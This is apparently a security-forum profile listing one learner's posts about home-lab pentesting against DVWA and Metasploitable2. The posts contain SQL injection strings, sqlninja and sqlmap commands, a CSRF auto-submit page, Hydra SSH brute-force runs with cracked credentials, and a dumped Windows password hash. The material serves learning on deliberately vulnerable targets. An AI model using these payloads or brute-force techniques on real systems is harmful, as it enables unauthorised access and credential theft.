pierre
-
Posts
106 -
Joined
-
Last visited
Posts posted by pierre
-
-
Ok I'll will maybe look for an MSSQL server to exploit :)
-
Here is my sqlninja conf file for GET method :
root@osboxes:~# more sql_get.conf —httprequest_start— GET http://192.168.1.1/DVWA/vulnerabilities/sqli/? id=1&Submit=Submit#';__SQL2INJECT__HTTP/1.0 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; U; en-US; rv:1.7.13) Gecko/20060418Firefox/1.0.8 Accept: text/xml, application/xml, text/html; q=0.9, text/plain; q=0.8, image/png,*/* Accept-Language: en-us, en; q=0.7, it;q=0.3 Accept-Charset: ISO-8859-15, utf-8; q=0.7,*;q=0.7 Content-Type: application/x-www-form-urlencoded Cookie: security=low; PHPSESSID=k4ooe285n9nco1a3kj01p0hv93 Connection: close —httprequest_end—
For this topology:
But yes I am on MySQL, maybe it is the problem..
-
Yes but "if it failed" shouldn't be considered with such a function no ?
However, I am aware there is other hardening step which can be implemented.
-
Hmm I don't understand you explanation..
-
Hello,
I would to initiate myself to sqlninja : http://sqlninja.sourceforge.net/
I already following this tutorial: http://techotweak.blogspot.fr/2015/05/what-is-sql-injection-and-how-to-use.html
But my injection is located at this url : http://192.168.1.1/DVWA/vulnerabilities/sqli/?
So I can't use the same file parameters ... and it fails :(
root@osboxes:~# sqlninja -mt -f sql_get.conf Sqlninja rel. 0.2.6-r1 Copyright (C) 2006-2011 icesurfer <r00t@northernfortress.net> [+] Parsing sql_get.conf... [-] HTTP request not defined in sql_get.conf Are you sure you are not using a configuration file of a previous version? Starting from version 0.2.6, the syntax has changed. See documentation
Has someone ever succed in using this tool ? :)
-
Yes so nearly impossible ;)
Thanks again for your clear explanations digininja :)
-
Yess exactly !! I try to escapte something that I didn't have to, I didn't have to encode my SQLi moreover.
Low level:
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
Medium level:
$query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
So in the medium level, our value isn't surround by quotes, so we don't have put ones :)
But if the medium level were:
$id = mysql_real_escape_string( $id ); $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
It would have been impossible to make SQLi ?
-
On 17/6/2016 at 0:37 PM, digininja said:
Simply intercept the request in Burp and add or edit the header before the request is passed on.
Yes but a client who has been redirected by a hacker webserver isn't supposed to use Burp.
On 18/6/2016 at 1:19 AM, fugu said:https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
I think this is the solution to that challenge, if I'm not mistaken.
Ok I'll change my hacker webserver DNS. :)
EDIT: Header Referer at 192.168.1.1 or http://192.168.1.1 make it works :)
-
On 17/6/2016 at 5:31 PM, digininja said:
No. The whole point of the function is to prevent injection. If someone found a bypass then it would open holes in so many apps that it would be patched within hours if not quicker.
Yes but if it is on level "Medium" on DVWA, it indicates that it might be bypassed ?
EDIT: I've succeed bypassing this evasion function but I don't know why...
Here is the original SQLi I want to pass:
1' OR '1'='1
I encode the space and equal in hexadecimal but not aposthophe, and it works (http://www.asciitable.com/):
Encoded SQLi: 1%20OR%201%3D1
My question is the following: why is the SQLi works even if I don't have apostrohpe in ?
Is it because equal and space aren't affected by my_real_escape_string() ?
Cf: http://php.net/manual/en/function.mysql-real-escape-string.php
mysql_real_escape_string() calls MySQL's library function mysql_real_escape_string, which prepends backslashes to the following characters: \x00, \n, \r, \, ', " and \x1a.
-
Hello,
I where wondering if someone has ever bypass this function mysql_real_escape_string
"mysql_real_escape_string() calls MySQL's library function mysql_real_escape_string, which prepends backslashes to the following characters: \x00, \n, \r, \, ', " and \x1a. "
For example I want to inout the classic : 1' or '1'='1 in a variable encapsulated by mysql_real_escape_string function.
Is it possible ?
EDIT: even SQLMAP don't make it !!
root@osboxes:/var/www/html# sqlmap -u "http://192.168.1.1/DVWA/vulnerabilities/sqli/#" --cookie="security=medium; PHPSESSID=u669kpihv3tsblhrgqo21lcu71"
[...]
[11:06:43] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
[11:06:43] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 222 times[*] shutting down at 11:06:43
-
18 hours ago, digininja said:
In two, how do you get from the first page to the second?
Simply by navigating on the website.
But another interesting thing, if from the W7 host : I run this html page with javascript included:
<html> <head> <title>Yo</title> </head> <body bgcolor=white> <script> window.onload = function(){ window.open("http://192.168.1.1/DVWA/vulnerabilities/csrf/test.php"); window.open("http://192.168.1.1/DVWA/vulnerabilities/csrf/?password_new=test&password_conf=test&Change=Change"); } </script> </body> </html>
Test.php is a page to test compare HTTP_REFERER & SERVER_NAME global variable, it prints this:
Hello you come from ! Hello you come from 192.168.1.1 ! Different IPs -> no HTTP_REFERER IP detect, blanck
That request didn't look correct. -> it means I can't change login/password HTTP_REFERER restriction even if HTTP_REFERER is blanck..
4 hours ago, fugu said:doesn't ereg and eregi use regular expressions? If you have control of what will end up in the referrer field, couldn't you try and make the referrer a very widely encompassing regex like .* or something? I'm not sure the * is valid in the hostname location but maybe you can figure something out.
Yes the point here is to bypass HTTP_REFERER restriction, on one client I can do BURP proxy :)
But on a client who has been redirected to the website by another webserver, I don't how to bypass HTTP_REFERER header..
-
1) I go to the page directly -> HTTP_REFERER=BLANK
2) I go from http://192.168.1.1/DVWA/index.php to http://192.168.1.1/DVWA/vulnerabilities/csrf/test.php -> HTTP_REFERER=BLANK
3) I go from http://192.168.0.1/index.html to http://http://192.168.1.1/DVWA/vulnerabilities/csrf/test.php -> HTTP_REFERER=192.168.0.1
So do you why in the 2nd situation, HTTP_REFERER header is still blank ?
-
21 hours ago, fugu said:
i don't know if you have the ability to modify the code, but if you can add
echo "<pre><code>"; var_dump($_SERVER); echo "</code></pre>";
will let you examine all the various header entries that are stored in the $_SERVER variable during your request.
Yes I test with this code :
<html> <head> <title>PHP Test</title> </head> <body> <?php echo ('Hello you come from '.$_SERVER['HTTP_REFERER'].' ! '); echo ('Hello you come from '.$_SERVER['SERVER_NAME'].' ! '); if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) ) { echo("Same IPs"); } else { echo("Different IPs"); } ?> </body> </html>I just fucking don't know how to add a new line in PHP but it works never mind :)
22 hours ago, digininja said:From the URL I sent
yes, it compares the two values using regular expressions.
The check is if the referrer, the page you are coming from, is on the same host as the page you are going to (technically not quite that but close enough) meaning HTTP_REFERER has to include SERVER_NAME for the match and so the code to get executed.
Yes but my HTTP_REFERER is either blanck or the IP from my hacker webserver (Kali) when the W7 hosts click on my Kali webserver to be redirect the Ubuntu webserver (CSRF) :
Cc:
I'm well block with the protection:
if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] )
I plan on how to inject HTTP_referer valued in an HTTP request to bypass the boolean protection above !
-
Yes I've googled, is it a comparaison function ?
Yes it is the medium protection.
Ah because on my test either HTTP_REFERER is the pirates web server IP or the field is blank...
So HTTP_REFERER could be equal to SERVER_NAME ?
-
Hello,
I'm understanding how CSRF works.
On DVWA, at medium level, here is some of the correction provides:
// Checks to see where the request came from
if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] )Do you what eregi() function is used ofr ?
I think SERVERNAME is my server_@IP ?
But what is http_referer ?
-
Non even for -t 16 I have :
[DATA] max 16 tasks per 1 server, overall 64 tasks, 280 login tries (l:14/p:20), ~0 tries per task
But I got these shitty lines:
The session file ./hydra.restore was written. Type "hydra -R" to resume session.
The session file ./hydra.restore was written. Type "hydra -R" to resume session.
The session file ./hydra.restore was written. Type "hydra -R" to resume session.So I think 6-8 are the right number of thread to execute Hydra.
-
I listen to the prompt and change my command:
root@osboxes:~# hydra -L user.old -P pass.old 192.168.0.2 ssh -t 4
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-14 04:52:22
[DATA] max 4 tasks per 1 server, overall 64 tasks, 280 login tries (l:14/p:20), ~1 try per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.0.2 login: klog password: 123456789
[22][ssh] host: 192.168.0.2 login: msfadmin password: msfadmin
[STATUS] 141.00 tries/min, 141 tries in 00:01h, 139 todo in 00:01h, 4 active
[22][ssh] host: 192.168.0.2 login: service password: service
[22][ssh] host: 192.168.0.2 login: sys password: batman
[STATUS] 137.50 tries/min, 275 tries in 00:02h, 5 todo in 00:01h, 4 active
1 of 1 target successfully completed, 4 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-14 04:54:26This time all credentials were well-found !!
Adding the options -t 4 to my command :)
-t TASKS
run TASKS number of connects in parallel (default: 16)It has something to do with the parallel tasks in the processor ?
I've made some tests :
A –t 6 makes the same good result within 1m24s.
A –t 8 makes the same good result within 57s.
A –t 10 makes the same good result within 50s.
A –t 11 makes a wrong result within 54s omitting 2/4 credentials.
And at -t 11 I got the warning:
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 11 tasks per 1 server, overall 64 tasks, 280 login tries (l:14/p:20), ~0 tries per taskThere is something scientific behind all this i'm sure !
-
Hello,
I work with Hydra on metasploitable2.
I have metasploitable credentials account in two files, "user" and "pass".
I just want to know account have SSH right configured, so I bruteforce.
Three account have SSH access on the target:
root@osboxes:~# ssh sys@192.168.0.2
sys@192.168.0.2's password:
sys@metasploitable:~$ exit
logoutroot@osboxes:~# ssh msfadmin@192.168.0.2
msfadmin@192.168.0.2's password:
msfadmin@metasploitable:~$ exit
logoutroot@osboxes:~# ssh service@192.168.0.2
service@192.168.0.2's password:
service@metasploitable:~$ exit
logoutNow I want to bruteforce with Hydra:
root@osboxes:~# more user
sys
klog
msfadmin
serviceroot@osboxes:~# more pass
service
msfadmin
123456789
batmanAnd here is my Hydra command and the result:
root@osboxes:~# hydra -L user -P pass 192.168.0.2 ssh
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-13 11:18:39
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 64 tasks, 16 login tries (l:4/p:4), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.0.2 login: service password: service
[22][ssh] host: 192.168.0.2 login: msfadmin password: msfadmin
[22][ssh] host: 192.168.0.2 login: klog password: 123456789
1 of 1 target successfully completed, 3 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-13 11:18:42Hydra is well recovering the password but not the right account.. It omits the account "sys:batman", do you know why ?
-
No I was misunderstanding
I work on LM hash and a LM is composed in 2 hashes, so i've got to put both to decrypt them:
:)
-
I've been succeeding in cracking this hash:e52cac67419a9a224a3b108f3fa6cb6d -> PASSWORD, so it may be the users's password
However, I don't succeed in this hash 8846f7eaee8fb117ad06bdd830b7586c.... so I don't what it should used for..
You think the 2nd is the salt ?
I don't supposed so because I am on Windows XP system
-
Hello,
I've dump hash on my XP VM and here is the output:
user:1004:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
In Linux it is like on /etc/passwd with 7 fields:Username:Password:User ID :Group ID:User ID Info:Home directory:Command/shell
Here we also have 7 fileds, but it like:
Username:User ID :HASH:HASH:::
Do you know what are the two hashes ?
-
Thank you I fully understand how it works now, the big difference between exploit & payload :)
-
Ah ok thanks I didn't understand it in that way...
Thanks you very much
-
So no exploit are needed, only a payload ?
The exploit is the human himself by launching the payload ?
bypass "mysql_real_escape_string"
in Security
Posted
you were meaning :
The escape string function is protecting the statment from exploitation, if the "escape string function" failed then the statement would no longer be protected. Imagine this over the whole of the internet.
Which I answer:
Yes but "if the escapte string statement failed" shouldn't be considered with such a function no ?